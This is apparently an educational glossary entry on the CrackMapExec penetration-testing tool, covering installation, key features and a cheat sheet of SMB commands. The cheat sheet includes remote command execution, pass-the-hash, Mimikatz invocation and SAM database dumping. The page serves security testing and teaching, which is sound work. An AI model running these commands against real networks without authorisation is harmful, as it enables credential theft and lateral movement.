CrackMapExec leverages SMB (Server Message Block) and other protocols to authenticate across networks, execute commands, propagate malware, and extract useful information from networked machines. This open-source toolkit, typically used in conjunction with other tools such as Metasploit, is valued for its efficiency in automating various tasks that, when done manually, would be time-consuming and repetitive.
The tool also aids in identifying systems that may be susceptible to known exploits or configurations prone to abuse. While CME is a powerful asset for legitimate security tasks, it can also be misused by attackers, underscoring the need for robust network security measures.
How to install CrackMapExec
Installing CrackMapExec is straightforward on most systems. CrackMapExec has three common methods used for installation, depending on your use case.
Python Installation
To install CrackMapExec with python (recommended). The CrackMapExec developers recommend this installation method due to the isolation of CrackMapExec’s core dependencies, which usually removes the clear majority of problems which can occur when trying to install the tool. Run the following commands sequentially to install the tool.
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec
Docker Installation
The developers of the tool provide a Docker installation, simply install Docker and run the following command:
docker pull byt3bl33d3r/crackmapexec
Binary Installation
It is also possible to install the tool with the Binary files provided by the developers. It must be noted, Python 3 must be installed in order to run the tool. You can find the binary files here.
How to use CrackMapExec (CME)
Using CME efficiently requires some experience using the tool on a live environment. To get you started, here’s a cheat sheet that covers some of the most commonly used functionalities and commands:
Basic usage
- List Hosts with SMB Signing Disabled:
crackmapexec smb <target-ip> --gen-relay-list relaylist.txt
- Get SMB Shares:
crackmapexec smb <target-ip> -u <username> -p <password> --shares
- Execute Command:
crackmapexec smb <target-ip> -u <username> -p <password> -x 'command'
- Deploy and Execute PowerShell Script:
crackmapexec smb <target-ip> -u <username> -p <password> --ps-exec 'powershell script'
Authentication
- Check for Null Sessions:
crackmapexec smb <target-ip> --null-session
- Use Hashes Instead of Password:
crackmapexec smb <target-ip> -u <username> -H <ntlmhash>
- Kerberos Authentication (Pass-the-Ticket):
crackmapexec smb <target-ip> -u <username> --k <path-to-ticket>
Modules and advanced usage
- Invoke Mimikatz Module:
crackmapexec smb <target-ip> -u <username> -p <password> -M mimikatz
- Spider SMB Shares:
crackmapexec smb <target-ip> -u <username> -p <password> --spider <share-name>
- Dump SAM Database:
crackmapexec smb <target-ip> -u <username> -p <password> --sam
Output handling
- Output Results to CSV File:
crackmapexec smb <target-ip> -u <username> -p <password> --output /path/to/output.csv
Miscellaneous
- Check for Logged in Users:
crackmapexec smb <target-ip> -u <username> -p <password> --loggedon-users
- Enumerate Local Admins:
crackmapexec smb <target-ip> -u <username> -p <password> --local-auth
Remember to use CrackMapExec responsibly and only in environments where you have permission to do so, as it is a powerful tool that can significantly impact network security and operations. Under no circumstances should you use the tool against a live environment without prior consent from the asset owners.
Key Characteristics:
- Network Efficiency: Streamlines various network penetration tasks, allowing for quick identification and exploitation of target systems.
- Modular Design: Comes with a suite of versatile modules that extend CME’s functionality for different tasks.
- Automation: Can simultaneously target multiple systems within a network, automating credential testing and exploiting known vulnerabilities.
- Multiprotocol Support: Works not just with SMB, but also other protocols like WinRM, MSSQL, and more.
Examples:
- Real-World Example: During an internal penetration test, a security consultant uses CME to test network resilience against lateral movement by attempting to spread across nodes using a list of known compromised credentials.
- Hypothetical Scenario: After gaining initial foothold in a corporate network, a red team member uses CME to enumerate local admin credentials and exploit misconfigurations to access higher-privileged accounts.
Related Terms:
- Penetration Testing: The practice of simulating a cyber attack against computer systems to identify exploitable vulnerabilities.
- Lateral Movement: The techniques that cyber attackers use to move deeper into a network in search of sensitive data and assets.
- Active Directory: A directory service developed by Microsoft that provides a variety of network services, commonly a target of tools like CME during security assessments.
Learn better by watching a video? Here is a YouTube video from Hacktive Education explaining how to use CrackMapExec.